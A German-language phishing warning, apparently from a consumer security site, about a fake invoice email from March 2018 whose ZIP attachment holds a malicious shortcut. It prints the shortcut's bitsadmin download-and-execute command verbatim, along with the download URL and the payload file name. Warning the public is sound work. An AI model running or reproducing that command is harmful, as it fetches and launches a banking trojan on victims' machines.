Rechnung für die Zahlung -für Herr/Frau Max Mustermann . von Gruen ([email protected]) bringt einen Online-Banking-Trojaner!
Am Sonntag, den 04. März 2018 wurde durch unbekannte Dritte die folgende betrügerische E-Mail in deutscher Sprache versendet. Klicken Sie nicht auf den Link und öffnen Sie nicht die ZIP-Datei! Eine Verknüpfung würde einen Online-Banking-Trojaner nachladen, der anschließend aufgrund von entstehenden Sicherheitslücken von Meltdown und Spectre in den Prozessoren Intel, AMD und ARM unter dem Vorwand eines neuen Verschlüsselungsalgorithmus Geld zu klauen!
Betreff: Rechnung für die Zahlung -für Herr/Frau Max Mustermann .
Absender: Gruen ([email protected])Bitte zahlen Sie die hier beiliegendeRechnung.
This email was sent to (E-Mail-Adresse)
why did I get this? unsubscribe from this list update subscription preferences
Agent: Grün · Uracher Straße 31 · Metzingen 72555 · Germany
Achtung: Es handelt sich um eine gefälschte E-Mail! Klicken Sie deswegen nicht auf den Link und öffnen Sie nicht das ZIP-Archiv! Es handelt sich nicht um eine Rechnung! Der Name des Absenders wird missbräuchlich verwendet.
Der Link „Rechnung“ bzw. das Icon verlinkt auf die Adresse auf atn-world.net/Rechnung%20fur%20die%20Zahlung.zip, von der ein ZIP-Archiv geladen würde.
Rechnung fur die Zahlung.zip
Das ZIP – Archiv enthält eine Verknüpfung. Klicken Sie nicht darauf, da sonst eine bösartige Software nachgeladen würde!
Diese Verknüpfung würde so aussehen:
%ComSpec% /c „bitsadmin /transfer hhmYERSEEEENTRY /priority foreground http://lan.grandguard.org/hmhGFRywlu.php %TEMP%\hmhGFRywlu.exe > NUL & start %TEMP%\hmhGFRywlu.exe“
Wie man hier sehen kann, soll eine Datei von /lan.grandguard.org/hmhGFRywlu.php geladen und im Temp-Verzeichnis als „hmhGFRywlu.exe“ abgelegt und ausgeführt werden.
Würde man diese Adresse im Browser aufrufen, würde eine Datei geladen:
72128cc32e3e14946b958a8b45ff375e.exe
Laut Virustotal beträgt die Erkennungsrate 11/66!
Es handelt sich um die gleiche Betrugswelle, die bereits seit Ende der letzten Woche verbreitet wird. Wie das Trojanische Pferd im Online-Banking Geld klauen möchte, sehen Sie in den Warnungen
- 22.02.2018 Rechnung 394811 von Meri Rigby, Arboritec AB, Sweden ([email protected]) bringt einen Online-Banking-Trojaner und versucht aufgrund von entstehenden Sicherheitslücken von Meltdown und Spectre in den Prozessoren Intel, AMD und ARM unter dem Vorwand eines neuen Verschlüsselungsalgorithmus Geld zu klauen
- 23.08.2018 rechnung von Piano & Voice ([email protected]) oder Herr (Vorname Nachname) – Rechnung von Anna Kristina ([email protected]) bringt einen Online-Banking-Trojaner!